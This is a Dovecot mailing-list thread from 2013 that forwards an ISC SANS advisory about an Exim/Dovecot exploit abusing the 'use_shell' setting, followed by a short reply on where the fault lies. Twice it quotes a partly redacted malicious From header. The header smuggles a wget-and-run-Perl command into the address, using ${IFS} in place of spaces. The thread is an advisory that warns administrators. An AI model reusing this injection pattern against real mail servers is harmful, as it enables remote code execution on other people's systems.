[Dovecot] from ISC: Exim/Dovecot exploit making the rounds
One of our readers wrote in to let us know that he had received an attempted Exim/Dovecot exploit attempt against his email server. The exploit partially looked like this:
From:
xwget${IFS}-O${IFS}/tmp/crew.pl${IFS}50.xx.xx.xx/dc.txt``perl${IFS}/tmp/crew.pl@blaat.com
(Obviously edited for your safety, and I didn't post the whole thing.)
This is an exploit against Dovecot that is using the feature "use_shell" against itself. This feature, unfortunately, is found in the example wiki on Dovecot's website, and also in their example configuration. We'd caution anyone that is using Dovecot to take a look at their configuration and make use they aren't using the "use_shell" parameter. Or if you are, make darn sure you know what you are doing, and how to defend yourself.
https://isc.sans.edu/diary/EximDovecot+exploit+making+the+rounds/15962
Ciao, luigi
-- / +--[Luigi Rosa]-- \
The generation of random numbers is too important to be left to chance.
Actually, it is an exploit against dovecot LDA, introduced, and caused by, exim.
On Sun, 2013-06-09 at 09:58 +0200, Luigi Rosa wrote:
One of our readers wrote in to let us know that he had received an attempted Exim/Dovecot exploit attempt against his email server. The exploit partially looked like this:
From: x
wget${IFS}-O${IFS}/tmp/crew.pl${IFS}50.xx.xx.xx/dc.txt``perl${IFS}/tmp/crew.pl@blaat.com(Obviously edited for your safety, and I didn't post the whole thing.)
This is an exploit against Dovecot that is using the feature "use_shell" against itself. This feature, unfortunately, is found in the example wiki on Dovecot's website, and also in their example configuration. We'd caution anyone that is using Dovecot to take a look at their configuration and make use they aren't using the "use_shell" parameter. Or if you are, make darn sure you know what you are doing, and how to defend yourself.
https://isc.sans.edu/diary/EximDovecot+exploit+making+the+rounds/15962
Ciao, luigi
participants (2)
-
Luigi Rosa
-
Noel Butler